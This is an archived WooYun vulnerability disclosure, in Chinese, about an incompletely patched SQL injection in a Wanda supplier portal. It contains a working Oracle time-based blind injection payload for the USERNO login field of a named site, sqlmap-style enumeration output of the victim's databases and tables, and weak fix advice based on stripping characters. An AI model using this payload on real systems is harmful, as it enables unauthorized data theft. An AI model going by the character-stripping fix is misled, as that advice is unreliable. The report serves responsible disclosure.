当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020609

漏洞标题:万达某系统再次注射

相关厂商:大连万达集团股份有限公司

漏洞作者: 小胖子

提交时间:2013-03-25 10:25

修复时间:2013-05-09 10:26

公开时间:2013-05-09 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-25: 细节已通知厂商并且等待厂商处理中
2013-03-25: 厂商已经确认,细节仅向厂商公开
2013-04-04: 细节向核心白帽子及相关领域专家公开
2013-04-14: 细节向普通白帽子公开
2013-04-24: 细节向实习白帽子公开
2013-05-09: 细节向公众公开

简要描述:

系统撸管老是射,多半是废了!用菊花牌系统防注射口服液!

详细说明:

问题系统:供应商系统 http://www.vans-china.cn
修复不完全,绕过登录被修复了,post修复不完全,从URL注射变成了盲注,得到N多数据。
post参数,USERNO。post包如下:
USERNO=1111' AND 2704=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(71)||
CHR(79)||CHR(66),5) AND 'vVvu'='vVvu&PWD=1111&imageField.x=27&imageField.y=9
---

postinject.jpg


DB用户.jpg


漏洞证明:

得到数据如下:

available databases [7]:
[*] "SYS"
[*] "SCMUSER"
[*] "SYSTEM"
[*] DBSNMP
[*] OUTLN
[*] WMSYS
[*] YSMSYS


当前数据库是SCMUSER

Database: SCMUSER
[93 tables]
+----------------------------+
| "EXPLAIN_OBJECT" |
| ADVISE_MQT |
| ADVISE_PARTITION |
| ADVISE_TABLE |
| ADVISE_WORKLOAD |
| ADVISG_INDEX |
| ADVISG_INSTANCE |
| DU_DUUSER |
| DU_LOG |
| DU_LOGERROR |
| DU_TXTLINE |
| DU_TXTSQL |
| ERRLOG |
| ERRLOIN_ARGUMENT |
| EXPLAIN_DIAGNOSTIC |
| EXPLAIN_DIAGNOSTIC_DETA |
| EXPLAIN_INSTANCE |
| EXPLAIN_OPERATOR |
| EXPLAIN_PREDICATE |
| EXPLAIN_STATEMENa |
| EXPLAIN_STREAM |
| INF_CONTINF |
| INF_GOODS |
| INF_GOODSCAT |
| INF_SHOP |
| INF_SUPINFO |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| SCM_SUPMKT |
| SYS_AL |
| SYS_AOGEVENT |
| SYS_MESSAGE |
| SYS_MSGTYPE |
| SYS_OENU |
| SYS_RLMEU |
| SYS_ROLE |
| SYS_ROLE1 |
| SYS_ROLE2 |
| SYS_ROLE3 |
| SYS_SCMUSER |
| SYS_SCMUSER_BAK |
| SYS_SCMUSER_ERR_BAK |
| SYS_SCMUSER_WQBAK |
| SYS_SHOPGROUP |
| SYS_SUPPARA |
| SYS_SURL |
| SYS_SURL_ERR_BAK |
| SYS_SURL_WH |
| SYS_TEMP_FBT |
| SYS_USERSHOP |
| T20080418_102524 |
| T20080418_102524_EXCEPTION |
| YW_BADJUSTDET |
| YW_BADJUSTHEAD |
| YW_BINSTRDETAIL |
| YW_BINSTRHEAD |
| YW_BORDERDET |
| YW_BORDERHEAD |
| YW_BSETSCHARGE |
| YW_BSETSDET |
| YW_BSETSHEAD |
| YW_BSETTLECHARGE |
| YW_BSETTLEDET |
| YW_BSETTLEHEAD |
| YW_BTCDDET |
| YW_BTCDHEAD |
| YW_GOODSSALE |
| YW_GOODSSALE_20110711 |
| YW_GOODSSALE_20110808 |
| YW_GOODSSALE_20110810 |
| YW_GOODSSALE_20110811 |
| YW_GOODSSALE_20110819 |
| YW_GOODSSALE_20110901 |
| YW_GOODSSALE_20110911 |
| YW_GOODSSALE_20110916 |
| YW_GOODSSALE_20110917 |
| YW_GOODSSALE_20110919 |
| YW_GOODSSALE_20111002 |
| YW_GOODSSALE_20111004 |
| YW_GOODSSALE_20111008 |
| YW_GOODSSALE_20111014 |
| YW_GOODSSALE_20111025 |
| YW_GOODSSALE_20111028 |
| YW_GOODSSALE_20111029 |
| YW_GOODSSALE_20111108 |
| YW_GOODSSALE_20111109 |
| YW_GOODSSALE_20111110 |
| YW_GOODSSTOCKS_BAK |
| YW_POPINFO |
| YW_ZRSTOCK |
+----------------------------+


无数多数据读了我一晚上。
好吧,没什么好说的了。

修复方案:

1:修复要完全啊大哥。
2:get到的参数,在经数据库比对前,需要将参数中的非法字符replace成空,这里USERNO和password都存在注射。
3:说好的电影卡呢?

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-25 10:35

厂商回复:

感谢小胖子同学的关注与贡献!修复不完整,旧的去了新的来了。。。

最新状态:

暂无